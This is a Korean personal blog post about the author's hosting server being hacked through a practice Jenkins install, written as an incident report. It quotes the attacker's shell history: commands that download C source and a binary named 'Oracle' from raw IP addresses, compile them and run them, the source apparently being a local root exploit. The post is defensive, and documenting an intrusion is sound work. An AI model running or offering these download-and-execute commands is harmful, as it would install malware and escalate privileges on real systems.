일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
- 맥북
- 클리어
- 공략
- 게임
- arduino
- 카카오
- OSX
- 닌텐도스위치
- 아이폰
- 요리
- Linux
- 유튜브
- 맛집
- 인그레스
- Java
- 설치
- PERL
- 쿠팡
- 프렌즈런
- game
- Mac
- 이마트트레이더스
- Ingress
- Python
- Installation
- 구글
- IntelliJ
- 판교
- MySQL
- Today
- 604
- Total
- 3,578,517
준호씨의 블로그
웹호스팅 해킹 당함 본문
좀 더 자세한 히스토리는 페이스북 쓰레드 확인
https://www.facebook.com/junho85/posts/10205263083553199
대략 2주 정도 전 인 것 같다. 호스팅 트래픽 초과 문자가 왔다. 80% 초과 했을 때 먼저 문자를 보내 준다고 안내 되어 있으나 빠른 속도로 트래픽이 다 찬 탓인지 이미 100% 초과 한 다음에서야 문자가 왔다. 1GB 초과당 120원이 부과 되는데 해킹으로 의심되는 증상으로 트래픽 초과 한 부분이라 특별히 한 번 감면 해 준다고 했다. 다행;;
트래픽이 계속 늘어 나는 것을 막기 위해 일단 트래픽 차단을 걸어 두고 트래픽 리셋이 된 후에야 후속 조치를 할 수 있었다.
user jenkins 로 실행 되던 Oracle 이라는 프로세스가 수상 해서 강제로 kill 했었는데 그것이 범인이 맞았다.
정확한 원인은 따로 확인은 안 해 봤으나 수상한 프로세스나 /tmp 에 있던 수상한 파일들의 user 정보가 jenkins 였다는 점으로 미루어 보다 1차 원인은 jenkins 였던 것으로 보인다.
public 서버에서 jenkins 는 안돌려야 겠다;; 그냥 연습삼아 깔았던 jenkins 로 인해 문제가 생길 줄이야 ㅠㅠ
http://dan.thoeisen.dk/hjem/lets-hack-a-jenkins-server/
이런 류의 글들이 많은 것으로 보아 script console 등을 통해 뭔가 수행 했으리라 추측 된다.
jenkins 계정의 .bash_history 내용은 다음과 같았다.
cd /tmp
gcc
wget http://120.25.12.45/1.c
gcc 1.c -o 1
chmod 777 1
./1
wget http://43.230.147.24:8080/Oracle
chmod 777 Oracle
./Oracle
exit
1.c 파일은 http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html 에 나와 있는 보안 문제를 이용하여 root 권한을 얻기 위한 것이 아닐까 추측된다.
아무튼 apt-get remove jenkins 로 jenkins 는 제거 했다. public ip 를 사용하는 서버에서는 특히나 보안에 주의 해야 겠다.
'IT이야기' 카테고리의 다른 글
ecto 로 글 써 보기 (1) | 2015.11.12 |
---|---|
ipython 을 이용해서 heart 그리기 (0) | 2015.11.09 |
구글애드센스 지급 (0) | 2015.11.02 |
맥북(osx)에 아이폰 사진 옮겨 오기. 아이폰 사진 옮기기 (0) | 2015.10.11 |
ubuntu 에 WordPress 설치 (0) | 2015.10.11 |